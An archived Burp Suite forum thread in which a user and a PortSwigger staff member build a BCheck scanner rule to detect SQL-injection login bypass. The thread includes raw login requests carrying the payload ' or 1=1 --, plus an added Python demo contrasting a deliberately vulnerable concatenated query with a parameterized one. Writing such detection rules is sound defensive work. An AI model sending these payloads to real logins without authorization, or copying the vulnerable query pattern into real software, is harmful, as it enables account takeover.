The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

BCheck SQLi bypass authentication

Ventsislav | Last updated: Feb 28, 2024 09:23AM UTC

Hi Hannah and all, can you answer something for BCheck: how can I check for vulnerabilities in the body of the POST request, for example:

```
Content-Length: 33
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/lssems/admin/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: close

username=vulnerability_check&password=vulnerability_check
```

I know that I can use Intruder, but the question is how can I build a BCheck that checks exactly this for me? BR

Hannah, PortSwigger Agent | Last updated: Feb 28, 2024 11:57AM UTC

Hi, could you describe a bit more about what checks you would like to implement?

Ventsislav | Last updated: Feb 28, 2024 01:51PM UTC

Bypass user or password SQLi, that's it =)

```
Content-Length: 33
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/lssems/admin/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: close

username=' or 1=1 --&password=something_dsadsadsa
```

or vice versa

```
Content-Length: 33
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/lssems/admin/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: close

username=passs&password=' or 1=1 --
```

BR

Ventsislav | Last updated: Feb 29, 2024 09:09AM UTC

Dear Hannah, here is exactly what I am asking for... ❤️ [https://www.youtube.com/watch?v=73PVoVPWW5A] BR to all team ❤️

Ventsislav | Last updated: Feb 29, 2024 10:19AM UTC

Dear, if this is not possible, thank you =) Don't worry, I am OK :) BR

Hannah, PortSwigger Agent | Last updated: Feb 29, 2024 11:39AM UTC

It looks like you would want to write an insertion-point level BCheck, that only performs the check on body insertion points. Please note that depending on the insertion point, your payload may be encoded.

You can find an example below:

```
metadata:
    language: v2-beta
    name: "Insertion-point-level"
    description: "Inserts a payload into body insertion points"
    author: "Carlos Montoya"

define:
    data = "' or 1=1 --"

given body insertion point then
    if {base.response.status_code} is "200" then
        send payload:
            replacing: {data}

        if {latest.response.status_code} is "302" then
            report issue:
                severity: high
                confidence: tentative
                detail: "<ADD_DETAIL_HERE>"
                remediation: "Manual investigation is advised."
        end if
    end if
```
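To make clear what the BCheck above is actually detecting, and why its confidence is only "tentative", here is an added example that is not part of the thread and not PortSwigger's code: a minimal login handler backed by an in-memory SQLite table. The vulnerable version concatenates the form fields into the query, so the payload from the BCheck's `define` block rewrites the `WHERE` clause whether it lands in `username` or in `password`; the parameterized version treats the same input as plain data. The table contents, the `status_for` mapping (302 on successful login, 200 when the login page is re-served) and the `run_check` helper are constructed assumptions that mirror the check's logic, not anything the scanner itself does.

```python
"""Vulnerable vs. parameterized login query, exercised with the BCheck payload.

Added example (not from the thread). The user table, the status-code mapping
and the helper names below are constructed for illustration.
"""
import sqlite3

PAYLOAD = "' or 1=1 --"  # the value the BCheck's define block inserts


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a single account (plaintext only to keep the example short)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'hunter2')")
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    # Deliberately vulnerable: form fields are concatenated into the SQL text.
    # A quote in either field closes the string literal, "or 1=1" makes the
    # predicate true for every row, and "--" comments out whatever follows.
    sql = (
        "SELECT 1 FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return con.execute(sql).fetchone() is not None


def login_safe(con: sqlite3.Connection, username: str, password: str) -> bool:
    # Hardened form: bound parameters, so the quote and the comment marker are
    # compared as data and never change the query structure.
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


def status_for(login_ok: bool) -> int:
    """Assumed app behaviour the BCheck keys on: 302 redirect after a successful
    login, 200 (the login page again) after a failed one."""
    return 302 if login_ok else 200


def run_check(login_fn) -> dict:
    """Mirror the BCheck's two body insertion points: payload in username, then in password."""
    con = make_db()
    return {
        "username": status_for(login_fn(con, PAYLOAD, "something_dsadsadsa")),
        "password": status_for(login_fn(con, "passs", PAYLOAD)),
    }


if __name__ == "__main__":
    print("vulnerable handler:", run_check(login_vulnerable))  # both fields -> 302
    print("parameterized handler:", run_check(login_safe))    # both fields -> 200
```

The caveat this makes visible: the check treats any 302 after the payload as a hit. An application that redirects on every POST (for example back to the login page with an error flag) will trigger the same report, which is why the BCheck marks the finding "tentative" and the remediation field asks for manual investigation; when triaging, compare the redirect target and any session cookie set on the payload response against those from the base request before raising confidence.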

Ventsislav | Last updated: Feb 29, 2024 01:38PM UTC

Dear Hannah, everything is OK, I found a way to do this. Your help was useful!

Ventsislav | Last updated: Feb 29, 2024 01:39PM UTC

<3

Ventsislav | Last updated: Feb 29, 2024 01:50PM UTC